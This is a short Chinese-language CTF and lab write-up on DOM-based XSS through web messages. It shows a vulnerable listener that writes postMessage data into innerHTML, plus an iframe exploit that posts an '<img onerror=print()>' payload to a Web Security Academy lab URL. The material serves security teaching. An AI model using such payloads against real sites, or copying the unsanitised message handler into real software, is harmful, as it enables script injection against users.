当前位置: 首页 > article >正文

CTF-WEB: 利用Web消息造成DOM XSS

article 2025/2/14 0:23:19

如果索引中有类似如下代码

<!-- Ads to be inserted here -->
<div id='ads'>
</div>
<script>
    window.addEventListener('message', function(e) {
        document.getElementById('ads').innerHTML = e.data;
    });
</script>
  • 这行代码的作用是将接收到的消息内容(e.data)设置为 id'ads' 的元素的 HTML 内容

那么在受害者段执行如下代码会导致DOM污染

<iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

参考

实验:使用 Web 消息的 DOM XSS |网络安全学院


http://www.kler.cn/a/544165.html

相关文章:

  • LabVIEW软件需求开发文档参考
  • 【Antv G2 5.x】饼图添加点击事件,获取当前坐标数据
  • 清华大学新闻与传播学院沈阳团队出品的《DeepSeek:从入门到精通》104页PDF
  • android launcher拖动图标释放错位
  • vue纯静态实现 视频转GIF 功能(附源码)
  • 游戏引擎学习第98天
  • 服务器芯片合封电源解决方案
  • 系统漏洞扫描服务:安全风险识别与防护指南
  • AI模型指标
  • Vue.js学习笔记(八)H5性能优化——首屏加载速度提升
  • DeepSeek之Api的使用(将DeepSeek的api集成到程序中)
  • React 第二十四节 useDeferredValue Hook 的用途以及注意事项详解
  • 热更图片方案
  • 【STM32】通过HAL库Flash建立FatFS文件系统并配置为USB虚拟U盘MSC
  • 构建Python量化交易环境:从基础安装到项目创建
  • STM32 RCC功能说明 复位和时钟控制RCC
  • 自然语言处理(NLP)在智能语音助手中的应用进展
  • ECharts鼠标悬浮提示框数字设置鼠标在左侧时 tooltip 显示到右侧,鼠标在右侧时 tooltip 显示到左侧。
  • git fetch和git pull 的区别
  • 1. 对比 LVS 负载均衡群集的 NAT 模式和 DR 模式,比较其各自的优势 。2. 基于 openEuler 构建 LVS-DR 群集。
  • 算法练习0212
  • 用什么格式的文件存储双语对照的文本比较好
  • ARM Cortex-M3/M4 权威指南 笔记【二】架构
  • GitCode 助力 Dora SSR:开启游戏开发新征程
  • 4-电脑一连接上自动弹框到路由器web配置页面
  • react 创建项目报错(react19)详细解决办法